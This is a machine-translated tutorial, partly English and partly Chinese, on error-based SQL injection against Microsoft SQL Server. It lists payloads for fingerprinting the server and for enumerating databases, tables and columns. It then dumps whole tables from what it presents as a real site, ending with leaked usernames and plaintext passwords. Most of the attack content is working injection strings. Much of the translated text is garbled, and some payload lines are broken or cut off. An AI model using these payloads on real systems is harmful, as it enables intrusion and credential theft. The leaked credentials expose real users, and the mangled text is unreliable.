Analyzing Data 0x01
① determine the type of database
and exists (select * from sysobjects) - return to normal as mssql (also Server name SQL)
and EXISTS (the SELECT COUNT (*) from sysobjects) - Sometimes the above statement is impossible to try this ha
② judge Database Version
Returns the correct database mssql
0X02 judge Database Version
?id=1 and 1=@@version—
?id=1 and substring((select @@version),22,4)='2008'—
- For non-echo mode, the 2008 version of the database is back, return to the normal copy the code 2008 is the first statement executed renderings (similar): The second statement is executed renderings :( If it is, then 2008 would return to normal )
0X03 Gets the number of all databases
and 1=(select quotename(count(name)) from master..sysdatabases)—
2. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) --
3. and 1=(select str(coun、 and 1=(select quotename(count(name)) from master..sysdatabases where dbid>5)--
and 1=(select str(count(name))%2b'|' from master..sysdatabases where dbid>5) --
and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) --
说明:dbid从1-4的数据库一般为系统数据库.
0x05 access to the database
and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(''))—
and 1=(select '|'%2bname%2b'|' from master..sysdatabases FOR XML PATH(''))—
0x06 Get the current database
and db_name()>0
and 1=(select db_name())—
0X07
⑦ acquire table in the current database (there are two statements are available to use) [The following statement can be a blast for all database tables (limited mssql2005 and above)]
and 1 = (select quotename (name ) from the database name WHERE xtype = ..sysobjects 'the U-' the FOR the XML the PATH ( '')) -
and. 1 = (SELECT '|'%% 2bname 2B '|' from the database name. .sysobjects where xtype = 'U' FOR XML PATH ( '')) - copying the code test results of FIG: 3 to give sensitive table: Whir_Sec_Users / Whir_Mem_Member / Whir_Mem_MemberGroup
[ahcmd][Siwebtmp][admin]
0X08
Column ⑧ get a list of all the columns in the specified table burst (limited mssql2005 and above):
and 1 = (select quotename (name ) from the database name ..syscolumns where id = (select id from the database name ..sysobjects where name = 'specified table name') the FOR the XML the PATH ( '')) -
and =. 1 ( select '|'% 2bname% 2b '|' from the database name ..syscolumns where id = (select id from the database name ..sysobjects where name = 'specified table name') FOR XML PATH ( '' )) -
Renderings: Since there account information, whether or not I am the administrator of the purpose of my message is not to get the information administrator, just to demonstrate the relevant information can be obtained by this method.
[id][name][password][home]
0X09 burst fields
⑨获取指定数据库中的表的列的数据库逐条爆指定表的所有字段的数据(只限于mssql2005及以上版本):
and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--
一次性爆N条所有字段的数据(只限于mssql2005及以上版本):
and 1=(select top N * from 指定数据库..指定表名 FOR XML PATH(''))--复制代码第一条语句:and 1=(select top 1 * from 指定数据库..指定表名 FOR XML PATH(''))--测试效果图:----------------------------------加上where条件筛选结果出来会更加好,如:where and name like '%user%' 就会筛选出含有user关键词的出来。用在筛选表段时很不错。
注意:在使用一次获取数据库信息的语句时,请使用火狐浏览器,笔者测试 IE8、360急速浏览器、猎豹浏览器均卡死,火狐浏览器也会导致出现几秒钟的卡死,弹出框框,我们点击“停止脚本”就会得到初步解决。!!!!!!!!!!!!!!!!!!!!至此,我们已经得到了账户信息了,至于管理员的呢,哈哈,大家自行测试时换表啥的就好了。
<id>1</id><name>alex</name><password>HACKER</password><home>LLLAS</home><id>2</id><name>BOM</name><password>QWE123z</password><home>bananqu</home><id>3</id><name>Csle</name><password>hu1982</password><home>jiujinsa</home><id>4</id><name>Fsjam</name><password>qwoe555</password><home>www</home><id>5</id><name>admin</name><password>admin</password><home>admin1111</home>